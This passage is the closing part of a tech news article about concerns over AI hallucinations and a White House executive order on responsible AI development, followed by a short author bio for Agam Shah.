AI tools such as Gemini and OpenAI's ChatGPT are improving productivity, but hallucinations and other shortcomings are raising concerns about the technology being used irresponsibly. The White House late last month issued an executive order on responsible use and development of AI development, which also recommends monitoring AI systems to prevent misuse.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Tag

#auth